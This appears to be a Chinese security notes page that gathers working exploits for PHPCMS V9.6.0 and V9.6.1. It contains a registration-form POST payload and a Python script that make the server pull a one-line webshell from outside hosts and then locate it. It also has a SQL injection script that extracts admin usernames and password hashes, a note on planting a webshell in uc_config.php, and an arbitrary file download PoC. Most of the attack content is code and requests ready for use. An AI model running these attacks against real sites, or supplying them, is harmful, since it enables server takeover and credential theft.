phpcms

Phpcms V9.6.0任意文件写入getshell

http://docs.ioin.in/writeup/139.129.31.35/_index_php_archives_524_/index.html
http://www.freebuf.com/vuls/131648.html
poc:

在前台注册页面,抓包,将post用一下字符串覆盖,src的一句话.txt地址根据情况写。在repeater里测试go时每一次都要修改username,password和email字段值(不能重复,汗)


post:
siteid=1&modelid=11&username=zf1agac121&password=aasgfaewee311as&email=a1ea21f94@qq.com&info[content]=<img src=http://note.cfyqy.com/php.txt?.php#.jpg>&dosubmit=1&protocol

脚本

# -*- coding:utf-8 -*-
import requests
import sys
from datetime import datetime
def getTime():
year = str(datetime.now().year)
month = "%02d" % datetime.now().month
day = "%02d" % datetime.now().day
hour = datetime.now().hour
hour = hour - 12 if hour > 12 else hour
hour = "%02d" % hour
minute = "%02d" % datetime.now().minute
second = "%02d" % datetime.now().second
microsecond = "%06d" % datetime.now().microsecond
microsecond = microsecond[:3]
nowTime = year + month + day + hour + minute + second + microsecond
return int(nowTime), year + "/" + month + day + "/"
def main():
if len(sys.argv) < 2:
print("[*]Usage : Python 1.py http://xxx.com")
sys.exit()
host = sys.argv[1]
url = host + "/index.php?m=member&c=index&a=register&siteid=1"
data = {
"siteid": "1",
"modelid": "1",
"username": "dsakkfaffdssdudi",
"password": "123456",
"email": "dsakkfddsjdi@qq.com",
# 如果想使用回调的可以使用http://file.codecat.one/oneword.txt,一句话地址为.php后面加上e=YXNzZXJ0
"info[content]": "<img src=http://file.codecat.one/normalOneWord.txt?.php#.jpg>",
"dosubmit": "1",
"protocol": "",
}
try:
startTime, _ = getTime()
htmlContent = requests.post(url, data=data)
finishTime, dateUrl = getTime()
if "MySQL Error" in htmlContent.text and "http" in htmlContent.text:
successUrl = htmlContent.text[htmlContent.text.index("http"):htmlContent.text.index(".php")] + ".php"
print("[*]Shell : %s" % successUrl)
else:
print("[-]Notice : writing remoteShell successfully, but failing to get the echo. You can wait the program crawl the uploadfile(in 1-3 second),or re-run the program after modifying value of username and email.\n")
successUrl = ""
for t in range(startTime, finishTime):
checkUrlHtml = requests.get(
host + "/uploadfile/" + dateUrl + str(t) + ".php")
if checkUrlHtml.status_code == 200:
successUrl = host + "/uploadfile/" + \
dateUrl + str(t) + ".php"
print("[*]Shell : %s" % successUrl)
break
if successUrl == "":
print(
"[x]Failed : had crawled all possible url, but i can't find out it. So it's failed.\n")
except:
print("Request Error")
if __name__ == '__main__':
main()

phpcms_v9.6.0_sql注入与exp

https://zhuanlan.zhihu.com/p/26263513
https://zhuanlan.zhihu.com/p/26263513
脚本

import requests
import sys
import urllib
url = sys.argv[1]
print 'Phpcms v9.6.0 SQLi Exploit Code By Luan'
sqli_prefix = '%*27an*d%20'
sqli_info = 'e*xp(~(se*lect%*2af*rom(se*lect co*ncat(0x6c75616e24,us*er(),0x3a,ver*sion(),0x6c75616e24))x))'
sqli_password1 = 'e*xp(~(se*lect%*2afro*m(sel*ect co*ncat(0x6c75616e24,username,0x3a,password,0x3a,encrypt,0x6c75616e24) fr*om '
sqli_password2 = '_admin li*mit 0,1)x))'
sqli_padding = '%23%26m%3D1%26f%3Dwobushou%26modelid%3D2%26catid%3D6'
setp1 = url + '/index.php?m=wap&a=index&siteid=1'
cookies = {}
for c in requests.get(setp1).cookies:
if c.name[-7:] == '_siteid':
cookie_head = c.name[:6]
cookies[cookie_head+'_userid'] = c.value
cookies[c.name] = c.value
print '[+] Get Cookie : ' + str(cookies)
setp2 = url + '/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id=' + sqli_prefix + urllib.quote_plus(sqli_info, safe='qwertyuiopasdfghjklzxcvbnm*') + sqli_padding
for c in requests.get(setp2,cookies=cookies).cookies:
if c.name[-9:] == '_att_json':
sqli_payload = c.value
print '[+] Get SQLi Payload : ' + sqli_payload
setp3 = url + '/index.php?m=content&c=down&a_k=' + sqli_payload
html = requests.get(setp3,cookies=cookies).content
print '[+] Get SQLi Output : ' + html.split('luan$')[1]
table_prefix = html[html.find('_download_data')-2:html.find( '_download_data')]
print '[+] Get Table Prefix : ' + table_prefix
setp2 = url + '/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id=' + sqli_prefix + urllib.quote_plus(sqli_password1, safe='qwertyuiopasdfghjklzxcvbnm*') + table_prefix + urllib.quote_plus(sqli_password2, safe='qwertyuiopasdfghjklzxcvbnm*') + sqli_padding
for c in requests.get(setp2,cookies=cookies).cookies:
if c.name[-9:] == '_att_json':
sqli_payload = c.value
print '[+] Get SQLi Payload : ' + sqli_payload
setp3 = url + '/index.php?m=content&c=down&a_k=' + sqli_payload
html = requests.get(setp3,cookies=cookies).content
print '[+] Get SQLi Output : ' + html.split('luan$')[1]

PHPCMS V9最新版本后台设计缺陷导致getshell

http://docs.ioin.in/writeup/www.cnbraid.com/_2016_09_14_phpcms_/index.html

一句话添加到如下位置

\phpsso_server\caches\configs\uc_config.php

PHPCMS V9.6.1 任意文件读取漏洞分析(含PoC,已有补丁)

https://paper.tuisec.win/detail/31d4818dd77e874

# coding: utf-8
'''
name: PHPCMS v9.6.1 任意文件下载
author: Anka9080
description: 过滤函数不严谨导致任意文件下载。
'''
import sys
import requests
from termcolor import cprint

def poc(target):
print('第一次请求,获取 cookie_siteid ')
url = target +'index.php?m=wap&c=index&a=init&siteid=1'
s = requests.Session()
r = s.get(url)
cookie_siteid = r.headers['set-cookie']
cookie_siteid = cookie_siteid[cookie_siteid.index('=')+1:]
# print cookie_siteid
print('第二次请求,获取 att_json ')

url = target + 'index.php?m=attachment&c=attachments&&a=swfupload_json&aid=1&src=%26i%3D1%26m%3D1%26d%3D1%26modelid%3D2%26catid%3D6%26s%3D./phpcms/modules/content/down.ph%26f%3Dp%3%25252%2*70C'
post_data = {
'userid_flash':cookie_siteid
}
r = s.post(url,post_data)
# print r.headers
for cookie in s.cookies:
if '_att_json' in cookie.name:
cookie_att_json = cookie.value
# print cookie_att_json
print('第三次请求,获取 文件下载链接 ')
url = target + 'index.php?m=content&c=down&a=init&a_k=' + cookie_att_json
r = s.get(url)
if 'm=content&c=down&a=download&a_k=' in r.text:
cprint('[!] Vul : {}'.format(target),'red')
return True
else:
return False
if __name__ == "__main__":

poc('http://localhost/PHPCMS/PHPCMS_v9.6.1/')

当前网速较慢或者你使用的浏览器不支持博客特定功能,请尝试刷新或换用Chrome、Firefox等现代浏览器